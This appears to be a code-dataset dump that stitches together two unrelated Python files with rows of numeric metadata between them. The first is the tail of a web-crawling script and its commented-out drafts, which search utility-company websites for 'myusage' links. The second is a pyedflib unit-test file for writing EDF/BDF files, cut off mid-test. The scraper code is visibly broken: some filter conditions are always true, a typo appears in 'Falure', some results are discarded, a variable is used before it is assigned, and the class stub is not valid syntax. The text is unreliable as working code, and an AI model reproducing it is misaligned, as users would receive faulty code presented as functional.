if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
except:
continue
else:
continue
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
else:
query_return.append("False")
except:
query_return.append("Failure")
for boolean in query_return:
print(boolean)
"""
"""
#JEA 500?
import pandas as pd
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
import os
query = "myusage"
query_return = []
for i in New_Utility_Links:
try:
df = pd.DataFrame({"URL":[i],"BOOL":["True"]})
external_urls = []
domain_name = urlparse(i).netloc
req = requests.get(i)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
os.system('cls')
print(df)
print(""*2)
print("Testing " + i)
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(i, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
continue
else:
if href not in df["URL"]:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
# URL TESTING
if query in external_urls:
query_return.append("True")
else:
for j in df["URL"]:
if df.loc[df['URL'] == j, 'BOOL'].iloc[0] == "False":
try:
#print("Testing " + j + " inside of " + i)
df.loc[df['URL'] == j, 'BOOL'].iloc[0] = "True"
req = requests.get(j)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(j, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if href in external_urls:
continue
if domain_name not in href:
if href not in external_urls:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
else:
if href not in df["URL"]:
if ".com" in href or ".net" in href or ".org" in href or ".co" in href or ".us" in href or ".uk" in href or ".in" in href:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
except:
continue
else:
continue
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
else:
query_return.append("False")
except:
query_return.append("Failure")
for boolean in query_return:
print(boolean)
"""
"""
import pandas as pd
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
import os
query = "myusage"
query_return = []
for i in New_Utility_Links:
try:
df = pd.DataFrame({"URL":[i],"BOOL":["True"]})
external_urls = []
domain_name = urlparse(i).netloc
req = requests.get(i)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
os.system('cls')
print(df)
print(""*2)
print("Testing " + i)
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(i, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if domain_name not in href:
if href not in external_urls:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
continue
else:
if href not in df["URL"].tolist():
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
# URL TESTING
if query in external_urls:
query_return.append("True")
else:
num = 0
for j in df["URL"].tolist():
if df.loc[df['URL'] == j, 'BOOL'].iloc[0] == "False":
try:
# Start Time
os.system('cls')
num += 1
print(str(time.time() - start_time))
print(str(len(df["URL"].tolist())))
print(str(num))
state = "True"
max_time = 15
start_time = time.time() # remember when we started
while (time.time() - start_time) < max_time and state == "True":
print(len(df["URL"]))
# End Time
#print("Testing " + j + " inside of " + i)
df.loc[df['URL'] == j, 'BOOL'].iloc[0] = "True"
req = requests.get(j)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(j, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if href in external_urls:
continue
if domain_name not in href:
if href not in external_urls:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
state = "False"
else:
if href not in df["URL"]:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
except:
continue
else:
continue
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
else:
query_return.append("False")
except:
query_return.append("Failure")
for boolean in query_return:
print(boolean)
"""
# Final... Compare the final_df to other variations to affirm reliability and enxure more accurate results
import pandas as pd
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import time
import os
query = "myusage"
query_return = []
req_run = int(input("How many times would you like to run this script?: "))
query_ret_dfs = []
final_df = pd.DataFrame()
for i in range(req_run):
df_name = "df%d" % i
for i in New_Utility_Links:
try:
df = pd.DataFrame({"URL":[i],"BOOL":["True"]})
external_urls = []
domain_name = urlparse(i).netloc
req = requests.get(i)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
os.system('cls')
print(df)
print(""*2)
print("Testing " + i)
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(i, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if domain_name not in href:
if href not in external_urls:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
continue
else:
if href not in df["URL"].tolist():
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
# URL TESTING
if query in external_urls:
query_return.append("True")
else:
num = 0
for j in df["URL"].tolist():
if df.loc[df['URL'] == j, 'BOOL'].iloc[0] == "False":
try:
# Start Time
os.system('cls')
num += 1
print(str(time.time() - start_time))
print(str(len(df["URL"].tolist())))
print(str(num))
state = "True"
print(len(df["URL"]))
# End Time
#print("Testing " + j + " inside of " + i)
df.loc[df['URL'] == j, 'BOOL'].iloc[0] = "True"
req = requests.get(j)
soup = BeautifulSoup(req.content, 'html.parser')
for tag in soup.findAll("a"):
max_time = 20
start_time = time.time()
while (time.time() - start_time) < max_time and state == "True":
href = tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(j, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
# URL TRACKING
if href in external_urls:
continue
if domain_name not in href:
if href not in external_urls:
if ".pdf" not in href or ".DOC" not in href or ".DOCX" not in href:
external_urls.append(href)
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
state = "False"
else:
if href not in df["URL"]:
if ".pdf" not in href and ".DOC" not in href and ".DOCX" not in href:
append_list = (href, "False")
df_length = len(df)
df.loc[df_length] = append_list
continue
except:
continue
else:
continue
checks = []
for exlink in external_urls:
if query in exlink:
checks.append("True")
else:
checks.append("False")
if "True" in checks:
query_return.append("True")
else:
query_return.append("False")
except:
query_return.append("Failure")
#print(query_ret_dfs)
df_name = pd.DataFrame({df_name:query_return})
query_ret_dfs.append(df_name)
#print(df_name)
#print(df0)
if len(query_ret_dfs) >= 2:
final_df = pd.concat([query_ret_dfs[0], df_name], axis=1)
print(final_df)
final_df.replace(to_replace ="False", value ="nan")
final_df.replace(to_replace ="Falure", value ="nan")
for i in final_df.columns:
final_df["df0"].fillna(final_df[i])
print(final_df)
for i in final_df.columns:
if i == "df0":
continue
else:
final_df = final_df.drop([i], axis=1)
print(final_df)
final = final_df["df0"].tolist()
for i in final:
print(i)
"""
FOR TESTING
Wiper is cool, good thing about it is I don't have to type '()' around it. Here is slight variation to it
# wiper.py
import os
class Cls(object):
def __repr__(self):
os.system('cls')
return ''
The usage is quite simple:
>>> cls = Cls()
>>> cls # this will clear console.
TIMER THREADING AKA DAEMON THREADING
from time import sleep
from threading import Thread
def some_task():
while True:
pass
t = Thread(target=some_task) # run the some_task function in another
# thread
t.daemon = True # Python will exit when the main thread
# exits, even if this thread is still
# running
t.start()
snooziness = int(raw_input('Enter the amount of seconds you want to run this: '))
sleep(snooziness)
# Since this is the end of the script, Python will now exit. If we
# still had any other non-daemon threads running, we wouldn't exit.
# However, since our task is a daemon thread, Python will exit even if
# it's still going.
WHILE "THREAD"
import time
max_time = int(raw_input('Enter the amount of seconds you want to run this: '))
start_time = time.time() # remember when we started
while (time.time() - start_time) < max_time:
do_stuff()
"""
"""
ALL FUNCTIONS IN A CLASS
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import argparse
import pandas as pd
class Dataset:
# Constructor
def __init__(self, names, search_query):
self.names = names
self.search_query = search_query
'''
parser = argparse.ArgumentParser()
parser.add_argument("names",)
parser.add_argument("search_query", help="This is required for scraping a link to a website from a name...")
'''
def get_website(self):
def get_all_links_per_website(self):
print(self.names)
def get_all info(self):
print("")
def clear_and_print(self):
# Call these fuctions / objects
Names = ['Richland Energy Services', 'City of Covington - (GA)', 'Union City Energy Authority', 'Dickson Electric Systems', 'JEA', 'Mount Pleasant Power System', 'Scottsboro Electric Power Board', 'Fulton Electric System', 'Blue Ridge Mountain EMC', 'Midstate', 'West Kentucky RECC', 'Marshall-DeKalb EC', 'Memphis Light, Gas, & Water', 'Caney Fork EC', 'Humboldt Utilities', 'Holly Springs Electric Department', 'City of Madison', 'Hopkinsville Electric System', 'ACE Power', 'Ocala Utility Services', 'Bolivar Energy Authority', 'Lake Worth Beach Utilities', 'Wilson Energy', 'Kansas City BPU', 'Denton Municipal Electric', 'Southwest Tennessee EMC', 'Dixie Electric Coop', 'Orlando Utilities Commission', 'City of Blakely', 'Russellville Electric Plant Board', 'Benton County Electric System', 'City of Salem, MO', 'Lexington Electric System', 'City of New Bern', 'Tri-State', 'Columbia Power and Water Systems', 'Lenoir City Utilities Board', 'Dothan', 'Pickwick EC', 'Wilson Internet', 'Tombigbee EPA', 'Rockwood Electric Utility', 'Shelbyville Power System', 'Utilities Board of Tuskegee (UBT)', 'Clinton Utilities Board', 'Rush Shelby', 'Greenville Electric Utility System (GEUS)', 'Town of Selma', 'Cleveland Utilities', 'Mayfield Electric & Water Systems', 'Guntersville Electric Board', 'Ripley Power and Light Cpmpany', 'Albertville Municipal Utilities Board', 'Franklin EPB', 'Town of La Grange', 'City of Douglas', 'Town of Benson', 'St Croix EC', 'Glasgow EPB', 'City of Tarrant Electric Department', 'Tennessee Valley EC']
search_query = input("Type the search that you would like to perform(for example, type: 'Official utility website for '(should include space at the end)) : ")
Dataset = Dataset(Names, search_query)
Dataset.
"""
| 46.269912
| 3,250
| 0.554308
| 6,295
| 52,285
| 4.512947
| 0.088801
| 0.046464
| 0.024218
| 0.016262
| 0.802598
| 0.791862
| 0.780492
| 0.756098
| 0.744482
| 0.716252
| 0
| 0.00754
| 0.307469
| 52,285
| 1,129
| 3,251
| 46.310895
| 0.777044
| 0.004915
| 0
| 0.540741
| 0
| 0.059259
| 0.511971
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0.081481
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71d408379d1902ee7db25498eb461f2ea32c8a1a
| 33,475
|
py
|
Python
|
pyedflib/tests/test_edfwriter.py
|
Wellysis/pyedflib
|
cfc8b728f4ae3bad94c2ff970a9b683b8ac3c67f
|
[
"BSD-2-Clause"
] | null | null | null |
pyedflib/tests/test_edfwriter.py
|
Wellysis/pyedflib
|
cfc8b728f4ae3bad94c2ff970a9b683b8ac3c67f
|
[
"BSD-2-Clause"
] | null | null | null |
pyedflib/tests/test_edfwriter.py
|
Wellysis/pyedflib
|
cfc8b728f4ae3bad94c2ff970a9b683b8ac3c67f
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2019 - 2020 Simon Kern
# Copyright (c) 2015 Holger Nahrstaedt
import os
import numpy as np
# from numpy.testing import (assert_raises, run_module_suite,
# assert_equal, assert_allclose, assert_almost_equal)
import unittest
import pyedflib
from datetime import datetime, date
class TestEdfWriter(unittest.TestCase):
@classmethod
def setUpClass(self):
data_dir = os.path.join(os.path.dirname(__file__), 'data')
self.bdfplus_data_file = os.path.join(data_dir, 'tmp_test_file_plus.bdf')
self.edfplus_data_file = os.path.join(data_dir, 'tmp_test_file_plus.edf')
self.bdf_data_file = os.path.join(data_dir, 'tmp_test_file.bdf')
self.edf_data_file = os.path.join(data_dir, 'tmp_test_file.edf')
self.data_dir = data_dir
tmpfiles = [f for f in os.listdir(data_dir) if f.startswith('tmp')]
for file in tmpfiles:
try:
os.remove(os.path.join(data_dir, file))
except Exception as e:
print(e)
def test_write_functions(self):
channel_info1 = {'label': 'label1', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 32767, 'physical_min': -32768,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'label2', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 32767, 'physical_min': -32768,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
# I'm not raising the errors, but rather go through all tests and
# raise the error at the end if there was any.
# this makes it easier to find patterns of which functions fail generally
error = False
print() # empty line for readability
# just looping through all write methods and see if they work
for file_type in [0, 1, 2, 3]:
filename = os.path.join(self.data_dir, 'tmp_write_{}.edf'.format(file_type))
with pyedflib.EdfWriter(filename, 2,
file_type=file_type) as f:
f.setSignalHeader(0, channel_info1)
f.setSignalHeader(1, channel_info2)
data = np.random.randint(-32768, 32767, 100)
for i in range(2):
res = f.writePhysicalSamples(data.astype(float))
if res<0:
print(res, 'Error for filetype {} on writePhysicalSamples signal {}'.format(file_type, i))
error = True
for i in range(2):
res = f.writeDigitalSamples(data.astype(np.int32))
if res<0:
print(res, 'Error for filetype {} on writeDigitalSamples signal {}'.format(file_type, i))
error = True
res = f.blockWritePhysicalSamples(np.hstack([data.astype(float)]*2))
if res<0:
print(res, 'Error for filetype {} on blockWritePhysicalSamples signal {}'.format(file_type, i))
error = True
res = f.blockWriteDigitalSamples(np.hstack([data.astype(np.int32)]*2))
if res<0:
print(res, 'Error for filetype {} on blockWriteDigitalSamples signal {}'.format(file_type, i))
error = True
with pyedflib.EdfReader(filename) as f:
data1 = f.readSignal(0)
data2 = f.readSignal(1)
try:
np.testing.assert_array_almost_equal(data1, data2)
self.assertEqual(data1.sum(), data.sum()*4, 'data written is not equal to data read')
self.assertEqual(len(data1), 400, 'didnt write 400 samples')
except Exception as e:
print(e)
error=True
if error:
raise IOError('Writetests not successfully, see log for details')
def test_subsecond_starttime(self):
f = pyedflib.EdfWriter(self.edfplus_data_file, 1,
file_type=pyedflib.FILETYPE_EDFPLUS)
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
startdate = datetime(2017, 1, 2, 13, 14, 15, 250)
header = {'technician': 'tec1', 'recording_additional': 'recAdd1', 'patientname': 'pat1',
'patient_additional': 'patAdd1', 'patientcode': 'code1', 'equipment': 'eq1',
'admincode':'admin1','gender':1,'startdate':startdate,'birthdate':date(1951, 8, 2)}
f.setHeader(header)
f.setStartdatetime(startdate)
f.setSignalHeader(0, channel_info)
data = np.ones(100) * 0.1
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
startdate2 = f.getStartdatetime()
assert startdate2==startdate, 'write {} != read {}'.format(startdate, startdate2)
del f
def test_subsecond_annotation(self):
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 1,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writeAnnotation(1.23456, 0.2222, u"annotation1_ä")
f.writeAnnotation(0.2567, -1, u"annotation2_ü")
f.writeAnnotation(1.2567, 0, u"annotation3_ö")
f.writeAnnotation(1.3067, -1, u"annotation4_ß")
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
ann_time, ann_duration, ann_text = f.readAnnotations()
del f
np.testing.assert_almost_equal(ann_time[0], 1.2345, decimal=4)
np.testing.assert_almost_equal(ann_duration[0], 0.2222, decimal=4)
np.testing.assert_equal(ann_text[0], "annotation1_..")
np.testing.assert_almost_equal(ann_time[1], 0.2567, decimal=4)
np.testing.assert_almost_equal(ann_duration[1], -1)
np.testing.assert_equal(ann_text[1], "annotation2_..")
np.testing.assert_almost_equal(ann_time[2], 1.2567, decimal=4)
np.testing.assert_almost_equal(ann_duration[2], 0)
np.testing.assert_equal(ann_text[2], "annotation3_..")
np.testing.assert_almost_equal(ann_time[3], 1.3067, decimal=4)
np.testing.assert_almost_equal(ann_duration[3], -1)
np.testing.assert_equal(ann_text[3], "annotation4_..")
def test_EdfWriter_BDFplus(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 2,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
f.setTechnician('tec1')
f.setRecordingAdditional('recAdd1')
f.setPatientName('pat1')
f.setPatientCode('code1')
f.setPatientAdditional('patAdd1')
f.setAdmincode('admin1')
f.setEquipment('eq1')
f.setGender(1)
f.setBirthdate(date(1951, 8, 2))
f.setStartdatetime(datetime(2017, 1, 1, 1, 1, 1))
f.setSamplefrequency(1,200)
f.setPhysicalMaximum(1,2)
f.setPhysicalMinimum(1,-2)
f.setLabel(1,'test 2')
f.setPhysicalDimension(1,'l2')
f.setTransducer(1,'trans2')
f.setPrefilter(1,'pre2')
data1 = np.ones(100) * 0.1
data2 = np.ones(200) * 0.2
f.writePhysicalSamples(data1)
f.writePhysicalSamples(data2)
f.writePhysicalSamples(data1)
f.writePhysicalSamples(data2)
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
np.testing.assert_equal(f.getTechnician(), 'tec1')
np.testing.assert_equal(f.getRecordingAdditional(), 'recAdd1')
np.testing.assert_equal(f.getPatientName(), 'pat1')
np.testing.assert_equal(f.getPatientCode(), 'code1')
np.testing.assert_equal(f.getPatientAdditional(), 'patAdd1')
np.testing.assert_equal(f.getAdmincode(), 'admin1')
np.testing.assert_equal(f.getEquipment(), 'eq1')
np.testing.assert_equal(f.getGender(), 'Male')
np.testing.assert_equal(f.getBirthdate(), '02 aug 1951')
np.testing.assert_equal(f.getStartdatetime(), datetime(2017, 1, 1, 1, 1, 1))
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
np.testing.assert_equal(f.getLabel(1), 'test 2')
np.testing.assert_equal(f.getPhysicalDimension(1), 'l2')
np.testing.assert_equal(f.getPrefilter(1), 'pre2')
np.testing.assert_equal(f.getTransducer(1), 'trans2')
np.testing.assert_equal(f.getSampleFrequency(1), 200)
np.testing.assert_equal(f.getPhysicalMaximum(1), 2)
np.testing.assert_equal(f.getPhysicalMinimum(1), -2)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
del f
def test_EdfWriter_BDFplus2(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 2,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
f.setTechnician('tec1')
f.setRecordingAdditional('recAdd1')
f.setPatientName('empty')
f.setPatientCode('code1')
f.setPatientAdditional('patAdd1')
f.setAdmincode('admin1')
f.setEquipment('eq1')
f.setGender("Male")
f.setBirthdate(date(1951, 8, 2))
f.setStartdatetime(datetime(2017, 1, 1, 1, 1, 1))
f.setSamplefrequency(1,100)
f.setPhysicalMaximum(1,2)
f.setPhysicalMinimum(1,-2)
data1 = np.ones(100) * 0.1
data2 = np.ones(100) * 0.2
f.writePhysicalSamples(data1)
f.writePhysicalSamples(data2)
f.writePhysicalSamples(data2)
f.writePhysicalSamples(data1)
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
np.testing.assert_equal(f.getTechnician(), 'tec1')
np.testing.assert_equal(f.getRecordingAdditional(), 'recAdd1')
np.testing.assert_equal(f.getPatientName(), 'empty')
np.testing.assert_equal(f.getPatientCode(), 'code1')
np.testing.assert_equal(f.getPatientAdditional(), 'patAdd1')
np.testing.assert_equal(f.getAdmincode(), 'admin1')
np.testing.assert_equal(f.getEquipment(), 'eq1')
np.testing.assert_equal(f.getGender(), 'Male')
np.testing.assert_equal(f.getBirthdate(), '02 aug 1951')
np.testing.assert_equal(f.getStartdatetime(), datetime(2017, 1, 1, 1, 1, 1))
x01 = f.readSignal(0,000,100)
x02 = f.readSignal(0,100,100)
x11 = f.readSignal(1,000,100)
x12 = f.readSignal(1,100,100)
np.testing.assert_almost_equal(np.sum(np.abs(x01-data1)),0,decimal=4)
np.testing.assert_almost_equal(np.sum(np.abs(x02-data2)),0,decimal=4)
np.testing.assert_almost_equal(np.sum(np.abs(x11-data2)),0,decimal=4)
np.testing.assert_almost_equal(np.sum(np.abs(x12-data1)),0,decimal=4)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
del f
def test_EdfWriter_BDF(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdf_data_file, 2,
file_type=pyedflib.FILETYPE_BDF)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
del f
f = pyedflib.EdfReader(self.bdf_data_file)
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDF)
del f
def test_EdfWriter_EDFplus(self):
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.edfplus_data_file, 1,
file_type=pyedflib.FILETYPE_EDFPLUS)
header = {'technician': 'tec1', 'recording_additional': 'recAdd1', 'patientname': 'pat1',
'patient_additional': 'patAdd1', 'patientcode': 'code1', 'equipment': 'eq1',
'admincode':'admin1','gender':1,'startdate':datetime(2017, 1, 1, 1, 1, 1),'birthdate':date(1951, 8, 2)}
f.setHeader(header)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
np.testing.assert_equal(f.getTechnician(), 'tec1')
np.testing.assert_equal(f.getRecordingAdditional(), 'recAdd1')
np.testing.assert_equal(f.getPatientName(), 'pat1')
np.testing.assert_equal(f.getPatientCode(), 'code1')
np.testing.assert_equal(f.getEquipment(), 'eq1')
np.testing.assert_equal(f.getPatientAdditional(), 'patAdd1')
np.testing.assert_equal(f.getAdmincode(), 'admin1')
np.testing.assert_equal(f.getGender(), 'Male')
np.testing.assert_equal(f.getBirthdate(), '02 aug 1951')
np.testing.assert_equal(f.getStartdatetime(), datetime(2017, 1, 1, 1, 1, 1))
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDFPLUS)
del f
def test_EdfWriter_EDF(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.edf_data_file, 2,
file_type=pyedflib.FILETYPE_EDF)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data = np.ones(100) * 0.1
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
del f
f = pyedflib.EdfReader(self.edf_data_file)
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDF)
del f
def test_SampleWriting(self):
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre1','transducer':'trans1'}
channel_info2 = {'label':'test_label2', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre2','transducer':'trans2'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 2,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.ones(500) * 0.1
data2 = np.ones(500) * 0.2
data_list = []
data_list.append(data1)
data_list.append(data2)
f.writeSamples(data_list)
f.close()
f = pyedflib.EdfReader(self.bdfplus_data_file)
data1_read = f.readSignal(0)
data2_read = f.readSignal(1)
f._close
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_equal(len(data2), len(data2_read))
np.testing.assert_almost_equal(data1, data1_read)
np.testing.assert_almost_equal(data2, data2_read)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
def test_EdfWriter_EDF_contextmanager(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
